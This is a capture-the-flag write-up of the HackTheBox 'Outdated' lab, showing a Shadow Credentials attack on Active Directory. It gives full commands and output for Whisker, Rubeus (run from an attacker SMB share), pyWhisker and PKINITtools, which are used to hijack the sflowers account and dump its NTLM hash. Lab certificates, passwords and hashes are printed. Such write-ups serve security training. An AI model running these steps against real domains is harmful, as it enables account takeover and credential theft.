Outdated_Shadow_Credentials

AddKeyCredentialLink

---

during the bloodhound session, it has been identified that the btables user has a transitive privileged, addkeycredentiallink, over the sflowers user. this would grant the ability to write to the msds-keycredentiallink attribute of the sflowers user

this can be checked remotely as msds-keycredentiallink is a LDAP attribute

Confirmation

---

┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ echo -e '[realms]\n\n\tOUTDATED.HTB = {\n\t\tkdc = dc.outdated.htb\n\t}' | sudo tee /etc/krb5.conf
[sudo] password for kali: 
[realms]
 
	OUTDATED.HTB = {
		kdc = dc.outdated.htb
	}

First, I will configure the /etc/krb5.conf file locally, so that I can use Kerberos authentication with some of the tools

┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ KRB5CCNAME=btables@dc.outdated.htb.ccache bloodyAD -d OUTDATED.HTB -k --host dc.outdated.htb get search 'CN=SUSAN FLOWERS,CN=USERS,DC=OUTDATED,DC=HTB' --resolve-sd | grep -i ITStaff        
nTSecurityDescriptor.ACL.2.Trustee: ITStaff
nTSecurityDescriptor.ACL.9.Trustee: ITStaff

There are 2 ACEs granted to the ITStaff group or “domain object”

┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ KRB5CCNAME=btables@dc.outdated.htb.ccache bloodyAD -d OUTDATED.HTB -k --host dc.outdated.htb get search 'CN=SUSAN FLOWERS,CN=USERS,DC=OUTDATED,DC=HTB' --resolve-sd | grep -w nTSecurityDescriptor.ACL.2 
nTSecurityDescriptor.ACL.2.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.2.Trustee: ITStaff
nTSecurityDescriptor.ACL.2.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.2.ObjectType: ms-DS-Key-Credential-Link

This appears to be the one, trusting the ITStaff group with ms-DS-Key-Credential-Link for both write and read access

Shadow Credentials

---

shadow credentials attack abuse involves exploiting the Key Trust model in Active Directory, adding alternative credentials to user or computer accounts. This manipulation allows the attacker to obtain a Ticket Granting Ticket (TGT) and subsequently retrieve the NTLM hash for the targeted user or computer. The applied Shadow Credentials persist even after a user or computer changes their password. In the case of computer objects, abuse requires additional steps such as forging an RC4 silver ticket or utilizing the TGT to impersonate privileged users through S4U2Self, with modifications to the Service Ticket. Notably, this abuse doesn’t delegate access to another account, limiting exposure to the private key generated by the attacker. Moreover, it avoids the creation of potentially challenging-to-clean computer accounts until privilege escalation is achieved.

In order for this exploit to work the following requirements must be met;

• At least one Windows Server 2016 Domain Controller
  • confirmed through BloodHound
• A digital certificate for Server Authentication installed on the Domain Controller
  • ADCS service is up and running on the dc.outdated.htb host and ADCA is installed on the dc.outdated.htb host
• Windows Server 2016 Functional Level in Active Directory.
  • confirmed through BloodHound
• Compromise an account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object.
  • confirmed through BloodHound

the original author has developed a dedicated tool, whisker, and there is also a Python implementation of it, pyWhisker, which can be perform remotely.

I will be trying out both;

• [[#[Whisker](https //github.com/eladshamir/Whisker)|Whisker]]
• [[#[pyWhisker](https //github.com/ShutdownRepo/pywhisker)|pyWhisker]]

whisker

---

Since there is no pre-compiled binary available, I would need to compile one myself

By default, the project is configured for .NET 4.7.2. Considering the client.outdated.htb host has .NET 4.8.04084 installed and it is backward-compatible, I can go ahead and just compile it as is

PS C:\Users\btables\Documents> \\10.10.14.23\smb\Whisker.exe --help
 
Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their 
msDS-KeyCredentialLink attribute, effectively adding Shadow Credentials to the target account.
 
  Usage: ./Whisker.exe [list|add|remove|clear] /target:<samAccountName> [/deviceID:<GUID>] [/domain:<FQDN>]
               [/dc:<IP/HOSTNAME>] [/password:<PASWORD>] [/path:<PATH>] 
 
  Modes 
    list            List all the values of the the msDS-KeyCredentialLink attribute of a target object
    add             Add a new value to the msDS-KeyCredentialLink attribute of a target object
    remove          Remove a value from the msDS-KeyCredentialLink attribute of a target object
    clear           Clear all the values of the the msDS-KeyCredentialLink attribute of a target object.
                    Warning: Clearing the msDS-KeyCredentialLink attribute of accounts configured for 
                    passwordless authentication will cause disruptions.
 
  Arguments:
    /target:<samAccountName>  Required. Set the target name. Computer objects should end with a '$' sign.
 
    /deviceID:<GUID>          [remove mode] Required in remove mode. Set the DeviceID of the value to remove from the
                              attribute msDS-KeyCredentialLink of the target object. Must be a valid GUID.  
 
    [/domain:<FQDN>]          Optional. Set the target Fully Qualified Domain Name (FQDN). If not provided, will try to
                              resolve the FQDN of the current user.
 
    [/dc:<IP/HOSTNAME>]       Optional. Set the target Domain Controller (DC). If not provided, will try to target the
                              Primary Domain Controller (PDC).
 
    [/password:<PASWORD>]     [add mode] Optional in add mode. Set the password for the stored self-signed certificate. 
                              If not provided, a random password will be generated.
 
    [/path:<PATH>]            [add mode] Optional in add mode. Set the path to store the generated self-signed certificate 
                              for authentication. If not provided, the certificate will be printed as a Base64 blob.
 
==[Examples]=========
 
  list    => Whisker.exe list /target:computername$ /domain:constoso.local /dc:dc1.contoso.local
  add     => Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1
  remove  => Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /deviceid:2de4643a-2e0b-438f-a99d-5cb058b3254b
  clear   => Whisker.exe clear /target:computername$ /domain:constoso.local /dc:dc1.contoso.local
 
For this attack to succeed, the environment must have a Domain Controller running at least Windows Server 2016,
and the Domain Controller must have a server authentication certificate to allow for PKINIT Kerberos authentication.
 
This tool is based on code from DSInternals by Michael Grafnetter (@MGrafnetter).

Now that the binary is compiled, I can execute it on-mem over SMB

PS C:\Users\btables\Documents> \\10.10.14.23\smb\Whisker.exe list /target:sflowers
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Listing deviced for sflowers:
[*] No entries!

No entries for now. I will add one. No credential is needed since the current session is already established over WinRM

PS C:\Users\btables\Documents> \\10.10.14.23\smb\Whisker.exe add /target:sflowers
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password eeYeHxCmYp3MAxEK
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID faebf87a-5192-4a38-b016-496383c95541
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:
 
Rubeus.exe asktgt /user:sflowers /certificate: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 /password:"eeYeHxCmYp3MAxEK" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show

It has successfully generated a certificate and a key credential. Now I can just use Rubeus.exe to extract the NTLM hash

Hashdump (Rubeus.exe)

---

ps c:\Users\btables\Documents> \\10.10.14.23\smb\Rubeus.exe asktgt /user:sflowers /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCWUEgglhMIIJXTCCBhYGCSqGSIb3DQEHAaCCBgcEggYDMIIF/zCCBfsGCyqGSIb3DQEMCgECoIIE/jCCBPowHAYKKoZIhvcNAQwBAzAOBAjYbLGTA0lFlAICB9AEggTYgmYgNabozi0K/Vbya/WFKeZ7jtwG+fmWuw8w0XEVtRzy0n8SyxFr6OAlcUtjMANDcdY+xR/xQBrIi61kZojEnslnh5FSR+pVG+k4fNzHPk38cG/eolKz6H4kkQCSFKa8cW/KSxc6RNSApo3tHq45EbJvM3wP8xpZMBSxVmRAwv9W7cy646vLu+N128sBqmcn5oM3Hi6/UxHAEK0eaLuF4NkdKfsoFu0k/wWvXnhtfOJNTm3zMRBkpZJHtH6nlcdGFcmExp002Zjo+SPYDDJtS1NryoOGaCSodIsxW6RTl7FmS8OeSkW/R4LVVSMDrDGMLvuHRO1r4cXZ+atqc2z0CrWLzdDER6LFIpFfioi/3AsImHIN7BfAUMDIr9kzpqX2MRBDypaOFM8qY9xhqHDu8L8DQhHhDbQG6QC5BGA1j4xgdaqE07fIC2dCOub2nl0WB93XOk2y36ueD7ZauWHF7AvxzQsU1GymMwkWScQ0mbxmGFfzJ77Ne7E7O5HrCtqcH2P8+qdPa/wzPGeaQrWRIJZBARmpOR+BB1RkpiYam9DJKZz44SiLSpAp5Wj0+91ALmFuHkcgfTYuGUYaEjLnlAg1zrx+TSc/PEwMYO+pfO4IJrY3IfOAZupffBLCFPnaiNMqTnW0mnjy/9jAmINXxEImV07WuJnpkiFrJWq1ljqac0bfzGeJ9OXlO7MhtONd3/Bp2CKy3VnHvkCBOeKhSZvxXKmjXS8MXQre+112odXJ/Wl2m3P88nM5bnw3n0t33kHCKD5vG55j+EeWJFgHVmRfyw1yYTYmC0B7URwu7Bnn8E/h+VMjFkb3rLtXSkIF1VUy+CfRZRzPv2AzsuX8YqXBfwbTwVU6WBuVqMcc1m4lxvMExWvMGjsv2KL2U3eOZjs+tWDMEJVkGcCo/r8dgPuvLNV0OKl3h/xDcpD+UKKwdPp3F3on02FuRT7vgpCuf1NRV15NBgG9H0H/xCoEw7G4F7hFjcbdIOI5Rsx0ExJyWmQeQ0uPUmL2j6eKbjLadpK5EH1+Ek9PP30ucHWY4TKcOU8TL9TL7+PDGjulMHV9YG4ukKIj4jE9QC/zcf3xaAB16clTrO2268wQj7ax/GTTcQYIDNgOrND2Sf4s/bLKU7Pc+P3WT/+APSzj00RLN6spMiAccvZfoMsE14lQf/IEQQVBagS3p4QvM0rce+ODf8cYrPTaSvMCbyv3zrgXX9mZKSBdqVIS0eJtY3PtQ+jN3OGnvECbdocXZ+gRSPhdAFip5oxuY3X9DCrYx+iWYgVsdeGvRyeRUcVno1MvsDAVToSrGfKTMMe4RyvoWjnWZ8s9U44ZO65oSFAxCoKsfyP/LK6d56Z6SmNExGVKP193+Ufii7Kd3UsJ/UmwNCfU32kr0hlMGsK9cQZmHY27eEOIUG7SCztwftyHhetQAuOP/jYOHtXBYOCDH3zjl7n+nX5zrZXLRCmMBYN27gNDkOE1mq9Lk3AdJTxrKWY4Wzwr1FsSa5KDL6d3sfw3Cgt2jPAk2/OZUi0mlqqLacWy1txvdzQ75Bgt1c2eD1e5r+PH6BVq8e+RoYwwPs+EHE79c9JsIWBfBs8v1L/1f9UIOxGL0CpyCuZFJxXZb8IimIzPLu1J0Xiy8KZzSwN++kkdJuoObbyrxzGB6TATBgkqhkiG9w0BCRUxBgQEAQAAADBXBgkqhkiG9w0BCRQxSh5IADEANQAzAGYAOABlADcAOQAtAGMAMgBhADUALQA0ADEAYwA3AC0AOQAyAGMANwAtADAAOAA2AGMAYgA5AGIAOAAzAGIAZgAyMHkGCSsGAQQBgjcRATFsHmoATQBpAGMAcgBvAHMAbwBmAHQAIABFAG4AaABhAG4AYwBlAGQAIABSAFMAQQAgAGEAbgBkACAAQQBFAFMAIABDAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAUAByAG8AdgBpAGQAZQByMIIDPwYJKoZIhvcNAQcGoIIDMDCCAywCAQAwggMlBgkqhkiG9w0BBwEwHAYKKoZIhvcNAQwBAzAOBAjsvRTpEFr/DAICB9CAggL46xBzp+v5L/C0xGERtpP5LD//uaoeihn+FPxGbUljGkXnHUV06yEMaBEDQfXJpCHlOtUUcmaOSUR4Ik7Ltqryn2QfJlnbPKVraivCBNbb1/yLpFHQLj+wkGALA4WeUCOFi/Ti+Y4EGhbcB0CM4Smn71E2+q7OdwUj4Tc3JeWHwMauNO+e3C7BZkw1B6QpnljIQgmV9LIswf7LSmuKP/HR6HNo2ayj3yoVRhCh2Z60psh2YGHBapVviMUjsRPZy416Q82ZAIZWS7uQVPR+S7CCV+7YpqyXqJiV5ZLMwQRZzOxjAS1C758fkiLP1mfoVaqS+0M56BW132dSG7k5mYPdd44+6KKFbgp8x5N2ha17ox665lUZ6dTus4d4MjH8D34jfngOSdzY9KmDGyTi5wtfb29uHDya7cg/UfHVh+HLBK+tj+mKy2DzglfiMPwbko1CokYFMkrXUt3X0yApI1QO5h6wYqsHpYa6VpghObL3Yl6A+GmYwLg0mYwCLChK/F/8jMLEyhRM+M6Asi3JnpgMZAmNXqO+nFzKZfTcajEMvKIE+diLUsEXqniJdmIPoLMSxa90mLSEIIjTlimIHMcXngihpxDpmrCPf/mY1rxV0mjdPLG6kMsByloSkuu5hW0dB8Z+3GTlKsAXiG9IAyTK/sj4XoUheOuoXi5Bm9HG9IAddDTn9wZJQKJYn8sx1tOA+ksnqCvL02FKAHIvptI42OahRUmorj83WeQH3X7dMR56myaQUL/2rJEZjYc68r+Js9LX2q54eGpyBy/DAqOs6yTBokMB6VZipV3kKZ91viqzz/RGYBZbkgeoXCF0iNxgU7tNEJEQkizEGUEA9zOS9zAZFuTaRMORTxE8d+NMiFXvdfICsva9TqhXVg1XX2Oop6SfAlgaicwmsE2/EqLpBYJgS/fRq6P4JjYmLta5L3tU+7bsoTHPzPAbxb/X8DOhSidm0SuaWWuJAgi4IirzuSugFqGDm3E9moLjNg//qhlLelp0/WHzLTA7MB8wBwYFKw4DAhoEFHpl6T2Zm50qGQahYcOlHSVRAgQrBBTXAc1WLUT0BqjVwLJQt6c2h8Xl4AICB9A= /password:"eeYeHxCmYp3MAxEK" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
 
   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
 
  v2.2.1 
 
[*] action: Ask TGT
 
[*] using pkinit with etype rc4_hmac and subject: CN=sflowers 
[*] building as-req (w/ pkinit preauth) for: 'outdated.htb\sflowers'
[*] using domain controller: 172.16.20.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
 
      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
 
  servicename              :  krbtgt/outdated.htb
  servicerealm             :  OUTDATED.HTB
  username                 :  sflowers
  userrealm                :  OUTDATED.HTB
  starttime                :  1/5/2024 8:16:50 PM
  endtime                  :  1/6/2024 6:16:50 AM
  renewtill                :  1/12/2024 8:16:50 PM
  flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  keytype                  :  rc4_hmac
  base64(key)              :  jaO+43X7MAzhYgXX4JapqQ==
  asrep (key)              :  6CF172BA51F7B5B981DBFF63715530D7
 
[*] Getting credentials using U2U
 
  credentialinfo         :
    version              : 0
    encryptiontype       : rc4_hmac
    credentialdata       :
      credentialcount    : 1
       ntlm              : 1FCDB1F6015DCB318CC77BB2BDA14DB5

using the same on-mem technique over smb, i can execute rubeus.exe to dump NTLM hash from the supplied certificate; 1FCDB1F6015DCB318CC77BB2BDA14DB5

Validation

---

┌──(kali㉿kali)-[~/…/htb/labs/outdated/ShadowCredentials]
└─$ impacket-getTGT OUTDATED.HTB/sflowers@dc.outdated.htb -hashes :1FCDB1F6015DCB318CC77BB2BDA14DB5 -k -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Saving ticket in sflowers@dc.outdated.htb.ccache

Validated and TGT saved for the sflowers user Now that the sflowers user is fully compromised, I can directly connect to the DC host by leveraging the group membership to the Remote Desktop Users

pyWhisker

---

┌──(kali㉿kali)-[~/…/htb/labs/outdated/ShadowCredentials]
└─$ KRB5CCNAME=btables@dc.outdated.htb.ccache pywhisker.py -d OUTDATED.HTB -u btables --kerberos --no-pass --use-ldaps --dc-ip $IP -t sflowers --action list --verbose
[*] Searching for the target account
[*] target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute

using the tgt of the btables user, i can do the very same thing with pywhisker

┌──(kali㉿kali)-[~/…/htb/labs/outdated/ShadowCredentials]
└─$ KRB5CCNAME=btables@dc.outdated.htb.ccache pywhisker.py -d OUTDATED.HTB -u btables --kerberos --no-pass --use-ldaps --dc-ip $IP -t sflowers --action add --verbose 
[*] Searching for the target account
[*] target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] keycredential generated with deviceid: f91b32be-637a-dee1-66b4-f58b8d8473b4
[*] Updating the msDS-KeyCredentialLink attribute of sflowers
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[verbose] no filename was provided. the certificate(s) will be stored with the filename: 9EfCfRfN
[verbose] no pass was provided. the certificate will be stored with the password: XDeBhRi3sezMezMfMWeI
[+] saved pfx (#pkcs12) certificate & key at path: 9EfCfRfN.pfx
[*] must be used with password: XDeBhRi3sezMezMfMWeI
[*] a tgt can now be obtained with https://github.com/dirkjanm/PKINITtools
[VERBOSE] Run the following command to obtain a TGT
[VERBOSE] python3 PKINITtools/gettgtpkinit.py -cert-pfx 9EfCfRfN.pfx -pfx-pass XDeBhRi3sezMezMfMWeI 
OUTDATED.HTB/sflowers 9EfCfRfN.ccache

It’s done and a certificate file is generated; 9EfCfRfN.pfx

this time, i will be using pkinittools to extract the NTLM hash

Certificate to TGT (PKINITtools)

---

┌──(kali㉿kali)-[~/…/htb/labs/outdated/ShadowCredentials]
└─$ python3 PKINITtools/gettgtpkinit.py OUTDATED.HTB/sflowers 2_sflowers@dc.outdated.htb.ccache -cert-pfx 9EfCfRfN.pfx -pfx-pass XDeBhRi3sezMezMfMWeI -dc-ip $IP
2024-01-06 05:32:45,615 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-01-06 05:32:45,625 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2024-01-06 05:32:54,232 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-01-06 05:32:54,232 minikerberos INFO     e6d6e56cad8698648f96a24032d38382558bd0a980c9d253925d3b85c0931567
INFO:minikerberos:e6d6e56cad8698648f96a24032d38382558bd0a980c9d253925d3b85c0931567
2024-01-06 05:32:54,234 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

I provided a different filename to save as TGT to differentiate from the other one Validate and TGT saved for the sflowers user

┌──(kali㉿kali)-[~/…/htb/labs/outdated/ShadowCredentials]
└─$ ll 2_sflowers@dc.outdated.htb.ccache 
4.0K -rw-r--r-- 1 kali kali 1.5K Jan  6 05:40 2_sflowers@dc.outdated.htb.ccache

There it is

Now that the sflowers user is fully compromised, I can directly connect to the DC host by leveraging the group membership to the Remote Desktop Users